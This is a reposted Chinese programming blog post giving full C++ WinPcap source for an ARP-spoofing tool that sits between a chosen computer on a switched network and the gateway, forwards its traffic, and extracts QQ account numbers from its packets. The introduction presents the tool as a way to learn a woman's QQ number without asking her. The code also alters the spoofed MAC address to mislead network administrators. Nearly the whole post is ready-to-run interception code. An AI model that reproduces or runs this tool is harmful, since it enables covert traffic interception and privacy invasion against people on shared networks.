基于visual c++之windows核心编程代码分析(47)实现交换网络的QQ号嗅探

当我们在一个交换网络里面,不知道别人的QQ号码是个很痛苦的事情,假如一个PLMM在上网,你却不知道她得QQ也没有勇气去问,是个很可惜的事情,

至于我们搞编程的,可以通过交换机的数据交换,嗅探出QQ号,因为QQ数据里面唯独QQ号码不加密。

[cpp] view plaincopyprint?

  1. #include "stdafx.h" 
  2. #include "pcap.h" 
  3. #include <stdio.h> 
  4. #include "Iphlpapi.h" 
  5. #include "protocol.h" 
  6.  
  7. #pragma comment(lib,"wpcap.lib") 
  8. #pragma comment(lib, "Iphlpapi.lib") 
  9. #pragma comment(lib,"wsock32.lib") 
  10. #define PCAP_OPENFLAG_PROMISCUOUS 1 
  11.  
  12. DWORD dwMyIp,dwGateIp,dwSubnet,dwDstIp; 
  13. UCHAR uMyMac[6],uGateMac[6],uDstMac[6]; 
  14. pcap_t *adhandle; 
  15. int nCount = 0;//用于执行三次获取网关MAC的操作 
  16. bool bGateMac = true
  17. bool bDstMac = true
  18.  
  19. void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]); 
  20. int SendPacket(char *pBuffer, int nLen); 
  21.  
  22. /* 每次捕获到数据包时,libpcap都会自动调用这个回调函数 */ 
  23. void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data) 
  24.     ETHeader *pETHdr = (ETHeader *)pkt_data; 
  25.     if(ntohs(pETHdr->type) == ETH_TYPE_ARP) 
  26.     { 
  27.         if(header->len < sizeof(ArpPacket)) return
  28.         ARPHeader *pArpHdr = (ARPHeader *)((char *)pkt_data+sizeof(ETHeader)); 
  29.         if(ntohs(pArpHdr->opcode) == ARPOP_REPLY) 
  30.         { 
  31.             if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwGateIp && bGateMac) 
  32.             { 
  33.                 if(nCount == 0) 
  34.                 { 
  35.                     memcpy(uGateMac,pArpHdr->smac,6); 
  36.                     nCount ++; 
  37.                 }else if(nCount == 3)//完成获取网关MAC 
  38.                 { 
  39.                     bGateMac = false
  40.                     return
  41.                 }else
  42.                     if(!memcmp(uGateMac,pArpHdr->smac,6)) 
  43.                     { 
  44.                         nCount ++; 
  45.                     }else
  46.                         nCount = 0; 
  47.                     } 
  48.                 } 
  49.                 SendArpRequest(dwGateIp,dwMyIp,uMyMac); 
  50.             } 
  51.             if(pArpHdr->daddr == dwMyIp && pArpHdr->saddr == dwDstIp && bDstMac) 
  52.             { 
  53.                 memcpy(uDstMac,pArpHdr->smac,6); 
  54.                 bDstMac = false
  55.             } 
  56.         } 
  57.     } 
  58.     if(ntohs(pETHdr->type) == ETH_TYPE_IP) 
  59.     { 
  60.         IpHeader *pIpHdr = (IpHeader *)((char*)pkt_data+sizeof(ETHeader)); 
  61.         if(pIpHdr->Protocol == PROTOCOL_UDP) 
  62.         { 
  63.             if(header->len < sizeof(ETHeader) + sizeof(IpHeader) + sizeof(UdpHeader)) return
  64.             UdpHeader *pUdpHdr = (UdpHeader *)((char*)pIpHdr+sizeof(IpHeader)); 
  65.             if(ntohs(pUdpHdr->SrcPort) == 8000) 
  66.             { 
  67.                 QQHeader *pQQHdr = (QQHeader *)((char*)pUdpHdr+sizeof(UdpHeader)); 
  68.                 if(pQQHdr->Flag != 0x02) return;//不是qq数据包 
  69.                 UCHAR uQQ[4]; 
  70.                 memcpy(uQQ,pQQHdr->Data,4); 
  71.                 DWORD dwQQ = 0; 
  72.                 for(int i=0;i<4;i++) 
  73.                 { 
  74.                     dwQQ = dwQQ*256+uQQ[i]; 
  75.                 } 
  76.                 printf("找到IP:%s的QQ号:%u\n",inet_ntoa(*(in_addr*)&pIpHdr->DstAddr),dwQQ); 
  77.             } 
  78.         } 
  79.         if(pIpHdr->DstAddr == dwDstIp && memcmp(pETHdr->dhost,uDstMac,6))//目的IP为要嗅探的IP,但是目的MAC不是对方的MAC 
  80.         { 
  81.             pETHdr->shost[5] ++;//源MAC不能设为网关MAC,否则会出现交换机欺骗,从而其它主机也无法上网 
  82.             memcpy(pETHdr->dhost,uDstMac,6); 
  83.             SendPacket((char*)pkt_data,header->len); 
  84.         } 
  85.     } 
  86.  
  87.  
  88. int SendPacket(char *pBuffer, int nLen) 
  89.     if(pcap_sendpacket(adhandle,(UCHAR *)pBuffer,nLen)) return 0; 
  90.     return 1; 
  91.  
  92. void SendArpRequest(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uSrcMac[]) 
  93.     ArpPacket *pArpPacket = new ArpPacket; 
  94.     for(int i =0;i<6;i++) 
  95.         pArpPacket->eth.dhost[i] = 0xFF; 
  96.     memcpy(pArpPacket->eth.shost,uSrcMac,6); 
  97.     pArpPacket->eth.type = ntohs(ETH_TYPE_ARP); 
  98.     pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER); 
  99.     pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP); 
  100.     pArpPacket->arp.maclen = 6; 
  101.     pArpPacket->arp.iplen = 4; 
  102.     pArpPacket->arp.opcode = ntohs(ARPOP_REQUEST); 
  103.     memcpy(pArpPacket->arp.smac,uSrcMac,6); 
  104.     pArpPacket->arp.saddr = dwSrcIP; 
  105.     memset(pArpPacket->arp.dmac,0,6); 
  106.     pArpPacket->arp.daddr = dwDesIP; 
  107.     SendPacket((char*)pArpPacket,sizeof(ArpPacket)); 
  108.     delete pArpPacket; 
  109.  
  110. void SendArpReply(DWORD dwDesIP, DWORD dwSrcIP, UCHAR uDesMac[], UCHAR uSrcMac[]) 
  111.     ArpPacket *pArpPacket = new ArpPacket; 
  112.     memcpy(pArpPacket->eth.dhost,uDesMac,6); 
  113.     memcpy(pArpPacket->eth.shost,uSrcMac,6); 
  114.     pArpPacket->eth.type = ntohs(ETH_TYPE_ARP); 
  115.     pArpPacket->arp.hrd = ntohs(ARPHRD_ETHER); 
  116.     pArpPacket->arp.eth_type = ntohs(ETH_TYPE_IP); 
  117.     pArpPacket->arp.maclen = 6; 
  118.     pArpPacket->arp.iplen = 4; 
  119.     pArpPacket->arp.opcode = ntohs(ARPOP_REPLY); 
  120.     memcpy(pArpPacket->arp.smac,uSrcMac,6); 
  121.     pArpPacket->arp.saddr = dwSrcIP; 
  122.     memcpy(pArpPacket->arp.dmac,uDesMac,6); 
  123.     pArpPacket->arp.daddr = dwDesIP; 
  124.     SendPacket((char*)pArpPacket,sizeof(ArpPacket)); 
  125.     delete pArpPacket; 
  126.  
  127. int WINAPI MyThread(LPVOID Param) 
  128. //  Sleep(100); 
  129.     SendArpRequest(dwGateIp,dwMyIp,uMyMac); 
  130.     while(1) 
  131.     { 
  132.         if(bGateMac) 
  133.         { 
  134.             ::Sleep(100); 
  135.             continue
  136.         } 
  137.         break
  138.     } 
  139.     printf("网关MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uGateMac[0],uGateMac[1],uGateMac[2],uGateMac[3],uGateMac[4],uGateMac[5]); 
  140.     printf("输入要嗅探的IP地址:"); 
  141.     char ip[20]; 
  142.     scanf("%s",ip); 
  143.     dwDstIp = inet_addr(ip); 
  144.     SendArpRequest(dwDstIp,dwMyIp,uMyMac); 
  145.     while(1) 
  146.     { 
  147.         if(bDstMac) 
  148.         { 
  149.             ::Sleep(100); 
  150.             continue
  151.         } 
  152.         break
  153.     } 
  154.     printf("目标MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n",uDstMac[0],uDstMac[1],uDstMac[2],uDstMac[3],uDstMac[4],uDstMac[5]); 
  155.     printf("输入每秒发送欺骗包的个数:1-50\n"); 
  156.     int nSpeed; 
  157.     scanf("%d",&nSpeed); 
  158.     UCHAR uMac[6];  
  159.     uMac[0] = uDstMac[0]; 
  160.     uMac[1] = uDstMac[1]; 
  161.     uMac[2] = uDstMac[3]; 
  162.     uMac[3] = uDstMac[2];//交换MAC的第三和第四个字节,迷惑管理员 
  163.     uMac[4] = uDstMac[4]; 
  164.     uMac[5] = uDstMac[5]; 
  165.     while(1) 
  166.     { 
  167.         SendArpReply(dwGateIp,inet_addr(ip),uGateMac,uMac); 
  168.         Sleep(1000/nSpeed); 
  169.     } 
  170.     return 0; 
  171.  
  172. int GetNetConfig(DWORD dwIp) 
  173.     PIP_ADAPTER_INFO pAdapterInfo = NULL; 
  174.     ULONG ulLen = 0; 
  175.  
  176.     // 为适配器结构申请内存 
  177.     ::GetAdaptersInfo(pAdapterInfo,&ulLen); 
  178.     pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen); 
  179.      
  180.     // 取得本地适配器结构信息 
  181.     if(::GetAdaptersInfo(pAdapterInfo,&ulLen) ==  ERROR_SUCCESS) 
  182.     { 
  183.         while(pAdapterInfo != NULL) 
  184.         { 
  185.             if(dwIp == inet_addr(pAdapterInfo->IpAddressList.IpAddress.String)) 
  186.             { 
  187.                 dwMyIp = dwIp; 
  188.                 memcpy(uMyMac,pAdapterInfo->Address,6); 
  189.                 dwSubnet = inet_addr(pAdapterInfo->IpAddressList.IpMask.String); 
  190. dwGateIp = inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
  191.                 //              CEther::SetGateWayAddr(inet_addr(pAdapterInfo->GatewayList.IpAddress.String),""); 
  192.                 printf("本机IP地址为:%s\n本机MAC为:%02X-%02X-%02X-%02X-%02X-%02X\n网关IP地址为:%s\n"
  193.                     pAdapterInfo->IpAddressList.IpAddress.String, 
  194.                     uMyMac[0],uMyMac[1],uMyMac[2],uMyMac[3],uMyMac[4],uMyMac[5], 
  195.                     pAdapterInfo->GatewayList.IpAddress.String); 
  196.                 return 1; 
  197.             } 
  198.             pAdapterInfo = pAdapterInfo->Next; 
  199.         } 
  200.         return 0; 
  201.     } 
  202.     return -1; 
  203. int main(int argc, char* argv[]) 
  204.     pcap_if_t *alldevs;  
  205.     pcap_if_t *d;  
  206.     int i = 0;  
  207.     char errbuf[PCAP_ERRBUF_SIZE];  
  208.      
  209.     /* Retrieve the device list from the local machine*/  
  210.     if (pcap_findalldevs(&alldevs, errbuf) == -1)   
  211.     {  
  212.         printf("Error in pcap_findalldevs_ex: %s\n", errbuf);  
  213.         exit(1);  
  214.     }  
  215.      
  216.     /* Print the list */  
  217.     for (d = alldevs; d != NULL; d = d->next)  
  218.     {  
  219.         /* Print the device’s name */  
  220.         printf("%d. %s", ++ i, d->name);  
  221.          
  222.         /* Print the device’s dscription */  
  223.         if (d->description)  
  224.         {  
  225.             printf("(%s)\n", d->description);  
  226.         }  
  227.         else  
  228.         {  
  229.             printf("(No description available)\n");  
  230.         }  
  231.     }  
  232.      
  233.     if (i == 0)  
  234.     {  
  235.         printf("\nNo interfaces found! Make sure WinPcap is installed.\n");  
  236.         return -1;  
  237.     }  
  238.     printf("Enter the interface number (1-%d):",i); 
  239.     int nIdx; 
  240.     scanf("%d", &nIdx); 
  241.      
  242.     if(nIdx < 1 || nIdx > i) 
  243.     { 
  244.         printf("\nInterface number out of range.\n"); 
  245.         /* 释放设备列表 */ 
  246.         pcap_freealldevs(alldevs); 
  247.         return -1; 
  248.     } 
  249.      
  250.     /* 跳转到选中的适配器 */ 
  251.     for(d=alldevs, i=0; i< nIdx-1 ;d=d->next, i++); 
  252.      
  253.     /* 打开设备 */ 
  254.     if((adhandle= pcap_open_live(d->name,          // 设备名 
  255.         65536,            // 65535保证能捕获到不同数据链路层上的每个数据包的全部内容 
  256.         PCAP_OPENFLAG_PROMISCUOUS,    // 混杂模式 
  257.         10,             // 读取超时时间 
  258.         errbuf            // 错误缓冲池 
  259.         )) == NULL) 
  260.     { 
  261.         fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name); 
  262.         /* 释放设备列表 */ 
  263.         pcap_freealldevs(alldevs); 
  264.         return -1; 
  265.     } 
  266.      
  267.     printf("\nlistening on %s...\n", d->description); 
  268.      
  269.     GetNetConfig(((sockaddr_in *)(d->addresses->addr))->sin_addr.S_un.S_addr); 
  270.     /* 释放设备列表 */ 
  271.     pcap_freealldevs(alldevs); 
  272.      
  273.     ::CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)MyThread,NULL,0,0); 
  274.     /* 开始捕获 */ 
  275.     pcap_loop(adhandle, 0, packet_handler, NULL); 
  276.     return 0; 

 

原文地址:http://blog.csdn.net/yincheng01/article/details/7214422

你可能感兴趣的:(基于visual c++之windows核心编程代码分析(47)实现交换网络的QQ号嗅探)